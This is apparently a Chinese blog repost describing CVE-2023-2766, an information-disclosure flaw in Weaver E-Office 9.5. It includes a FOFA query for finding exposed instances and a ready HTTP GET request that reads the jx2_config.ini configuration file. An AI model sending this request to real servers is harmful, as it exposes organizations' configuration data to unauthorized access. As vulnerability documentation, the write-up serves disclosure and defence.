首页 > 其他分享 >CVE-2023-2766

CVE-2023-2766

时间:2024-10-22 14:12:49浏览次数:6  
标签:537.36 2766 Accept 漏洞 configfile 2023 CVE

一. 漏洞描述

泛微 E-Office 是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。该产品 configfile
存在信息泄露

二. 漏洞影响版本

E-Office 9.5

三. 网络空间测绘查询

fofa

app="泛微-Eoffice"

四. 漏洞复现

GET /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

img

标签:537.36,2766,Accept,漏洞,configfile,2023,CVE
From: https://www.cnblogs.com/kalixcn/p/18492571

相关文章

  • CF2023D Many Games 题解
    赛时被创四了。思路考虑我们什么时候合并会比原来优。例如,我们现在要合并\(p_1,w_1\)和\(p_2,w_2\),同时保证,\(w_1\gew_2\)。那么有:\[\frac{p_1}{100}\timesw_1\le\frac{p_1}{100}\times\frac{p_2}{100}\times(w_1+w_2)\]\[\frac{p_2}{100}\timesw_2\le\frac{p_1}{......
  • VMware vCenter Server 8.0U3d 发布下载,修复堆溢出漏洞 (CVE-2024-38812) 和权限提升
    VMwarevCenterServer8.0U3d-集中管理vSphere环境ServerManagementSoftware|vCenter请访问原文链接:https://sysin.org/blog/vmware-vcenter-8-u3/查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgVMwarevCenterServer是一款高级服务器管理软件,提供了一......
  • VMware vCenter Server 8.0U2e 发布下载,修复堆溢出漏洞 (CVE-2024-38812) 和权限提升
    VMwarevCenterServer8.0U2e下载-集中管理vSphere环境ServerManagementSoftware|vCenter请访问原文链接:https://sysin.org/blog/vmware-vcenter-8-u2/查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgVMwarevCenterServer是一款高级服务器管理软件,提供......
  • CF2023 - D. Many Games
    先让\(p\)除以\(100\),相当于给你两个数组\(p,w\),然后要选择下标集合\(S\),使得:\(p\)的积乘上\(w\)的和最大化。注意到\(p_i\)是整数,并且\(1\lep_i\le100\)。那么容易想按照\(p_i\)分类。然后\(w_i\)对于固定\(p\)一定是选择排序后的最大值后缀。目前\((......
  • 信息学奥赛复赛复习18-CSP-J2023-01小苹果-向上取整、向下取整、模拟算法
    PDF文档公众号回复关键字:202410211P9748[CSP-J2023]小苹果[题目描述]小Y的桌子上放着n个苹果从左到右排成一列,编号为从1到n。小苞是小Y的好朋友,每天她都会从中拿走一些苹果。每天在拿的时候,小苞都是从左侧第1个苹果开始、每隔2个苹果拿走1个苹果。随......
  • 2023 ICPC Seoul Regional A. Apricot Seeds(Pjudge【NOIP Round #7】冒泡排序)
    题意一个序列,Q次询问一个区间[l,r],进行k轮冒泡后,求子区间[x,y]的和。(N<=1e6,Q<=5e5)冒泡定义为:fori=1ton-1:ifa[i]>a[i+1]:swap(a[i],a[i+1])考场想法:经典转01。110111000111000111111011100011100011111+1011100011100011111+1101100......
  • CTF杂项——[LitCTF 2023]OSINT 探姬去哪了?_0
    中国电信查看属性 发现经纬度经纬度转换搜索地址  发现在浙江省嘉兴市秀洲区高德地图上搜索依次试验  发现是中国电信大厦......
  • 2024-2025-1 20231309《计算机基础与程序设计》第三周助教总结
    课程答疑最近同学们的提问大多都是与虚拟机、Linux命令有关,往往是在具体操作上出现了未曾意料的报错。而出现此类问题的主要原因包括:操作不规范,如Linux命令输入不准确等解决方案:出现报错后首先检查自己输入的命令是否准确无误,例如是否少空格少参数等,再看是否有缺漏步骤等。......
  • 第九届中国大学生程序设计竞赛 深圳站(CCPC 2023 Shenzhen Site)
    Preface由于这周末大家都要补课,因此只能把训练挪到周五晚上了然后祁神打了2h就跑路去上课了,前期我和徐神也因为成都站相关的一些准备工作被迫脱离了比赛因此最后发现机时不够会写的D赛后30min过了,感觉正常打的话应该能出9题A.AGoodProblem考虑按值域分治,从二进制位......
  • PyCharm2023版本之后使用本地conda已存在环境的步骤方法
    2023新版本的pycharm在创建新项目并导入本地conda环境时与以往版本稍有不同,具体步骤如下:1、在新建项目窗口点击Previouslyconfiguredinterpreter 2、点击右侧蓝色AddInterpreter后点击AddLocalInterpreter进入本地环境选择窗口 点击后进入如下界面 3、之后点击Co......